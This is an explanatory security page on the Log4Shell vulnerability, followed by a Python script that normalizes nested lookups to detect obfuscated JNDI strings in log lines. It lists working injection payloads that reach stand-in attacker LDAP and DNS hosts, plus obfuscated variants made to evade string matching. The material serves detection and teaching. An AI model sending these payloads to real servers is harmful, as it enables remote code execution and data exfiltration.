Log4j JNDI Injection (Log4Shell, CVE-2021-44228) is a critical vulnerability in Apache Log4j 2.x that allows remote code execution through JNDI (Java Naming and Directory Interface) lookup injection in log messages.
Log4j's message lookup substitution expands expressions such as `${jndi:ldap://...}` that appear in logged strings. When user-controlled data containing such an expression is logged, Log4j performs a JNDI lookup against the attacker-controlled server named in it, and that server can return a reference to a malicious Java class, which the JVM then loads and executes.
1. Attacker sends: ${jndi:ldap://attacker.com/exploit}
2. Application logs the input using Log4j
3. Log4j performs JNDI lookup to attacker's LDAP server
4. LDAP server returns reference to malicious Java class
5. Java loads and executes the malicious class
```text
# Basic payload
${jndi:ldap://attacker.com/a}

# DNS exfiltration
${jndi:dns://attacker.com}

# Obfuscated payloads
${${lower:j}ndi:ldap://x.com/a}
${j${::-n}di:ldap://x.com/a}
${${env:NaN:-j}ndi:ldap://x.com/a}
```
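The obfuscated forms above defeat a naive `${jndi:` string match, so a detector has to undo the nested lookups the same way Log4j would before checking for the sink. The following added example (written for this page, not code from the Log4j project) normalizes the `lower`/`upper` and `${key:-default}` rewrites inside-out and then scans constructed access-log lines; `normalize_lookups`, `scan` and `SAMPLE_LOG` are names chosen here.

```python
import re

# Innermost ${...} lookup: no nested "${" or "}" inside the braces.
INNER = re.compile(r"\$\{([^${}]*)\}")
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def _resolve(match):
    """Collapse one innermost lookup as Log4j's substitution would; ${jndi:...} is kept so it can be flagged."""
    body = match.group(1)
    if body.lower().startswith("jndi:"):
        return match.group(0)              # the sink we want to surface
    if ":-" in body:                       # ${key:-default} -> default
        return body.split(":-", 1)[1]      # covers ${::-n} and ${env:NaN:-j}
    if body.lower().startswith("lower:"):
        return body[6:].lower()
    if body.lower().startswith("upper:"):
        return body[6:].upper()
    return match.group(0)                  # unknown lookup: leave untouched

def normalize_lookups(text, max_rounds=20):
    """Resolve nested lookups inside-out until the string stops changing."""
    for _ in range(max_rounds):
        new = INNER.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text

def scan(lines):
    """Return (line_number, normalized_line) for each line that reaches a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines, 1):
        norm = normalize_lookups(line)
        if JNDI.search(norm):
            hits.append((i, norm))
    return hits

# Constructed access-log lines for the demo, not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.7 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '203.0.113.8 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:ldap://x.example/a}"',
    '203.0.113.9 - - "GET / HTTP/1.1" 200 "${j${::-n}di:ldap://x.example/a}"',
    '203.0.113.10 - - "GET / HTTP/1.1" 200 "${${env:NaN:-j}ndi:ldap://x.example/a}"',
    '203.0.113.11 - - "GET /?q=${date:yyyy} HTTP/1.1" 200 "-"',  # benign lookup
]

if __name__ == "__main__":
    for n, norm in scan(SAMPLE_LOG):
        print(f"line {n}: {norm}")
```

Only the rewrites shown on this page are modelled, so this is a triage aid for log review, not a substitute for upgrading Log4j or disabling message lookups.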